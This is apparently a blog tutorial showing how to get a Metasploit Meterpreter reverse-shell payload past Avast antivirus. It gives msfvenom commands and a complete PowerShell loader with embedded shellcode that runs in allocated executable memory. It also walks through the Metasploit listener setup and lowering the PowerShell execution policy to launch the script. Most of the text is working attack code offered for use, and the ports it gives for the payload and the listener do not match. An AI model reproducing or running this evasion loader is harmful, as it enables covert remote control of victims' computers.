In this era of 2020, viruses are commonly found, which will attack our devices and antiviruses play a very important role in warding off viruses that attack our devices. You could say that with antivirus, various attacks, be it malware, adware, and viruses in general, cannot attack our devices, but what if we can bypass the antivirus so that our virus program can run without being detected by the antivirus.
Here I will do a test lab to bypass avast antivirus and this is the latest version of avast. First I will test creating a regular payload with the command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > test.exe
We will test to the virustotal web and get the results as shown in the picture.
It appears that our shell is detected in each antivirus, now we run it on windows that have avast antivirus, to make sure it is detected.
It is certain that the virus will be detected in Avast, then we will create a payload with the powershell format, namely "ps1" with additional code to bypass the avast antivirus.
You can follow the script code below and add shell code with the command :
Payload for 32bit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
Payload for 64bit:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
script code :
$code = '
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -p assthru;
[Byte[]];[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
We continue now to test on virustotal, it will appear as below:
It can be seen that the avast antivirus is not detected as a threat or virus, even though there are 6 antiviruses that detect it as a threat, we continue with virus scanning in avast with the condition that the file is already in windows.
It can be seen that the file is not detected as a virus or threat, now we test running the script in powershell and don't forget to activate metasploit with the module:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #for 32bit
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp #for 64bitmsf6 exploit(multi/handler) > set lhost 192.168.1.7 #THIS IS YOUR IP MADE IN MSFVENOMlhost => 192.168.1.7msf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.7 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port
Exploit target:
Id Name
-- ----0 Wildcard Target
msf6 exploit(multi/handler) > exploit -j -z[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.1.7:7788
Next we will execute the payload in windows as below:
Above we can see that we cannot run the program because of the policy on powershell, not because of the antivirus. We will set the execution scope powershell can run our script.
Do it according to the command below:
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUserUndefinedPS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUserExecution Policy ChangeThe execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies helptopic at https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): APS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUserUnrestricted
We have made the policy change in powershell, now we repeat running our payload with the command:
C:\WINDOWS\system32>powershellWindows PowerShellCopyright (C) Microsoft Corporation. All rights reserved.Try the new cross-platform PowerShell https://aka.ms/pscore6PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\PS C:\Users\User\Desktop> .\avtest.ps1Security warningRun only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm yourcomputer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warningmessage. Do you want to run C:\Users\User\Desktop\avtest.ps1?[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"): RIsPublic IsSerial Name BaseType-------- -------- ---- --------True True Byte[] System.Array447807488447807489447807490447807491447807492447807493447807494447807495447807496447807497447807498447807499447807500447807501447807502447807503447807504447807505447807506.................
If it is as above without the program experiencing not responding, the exploit is successful and will run as below:
0 Comments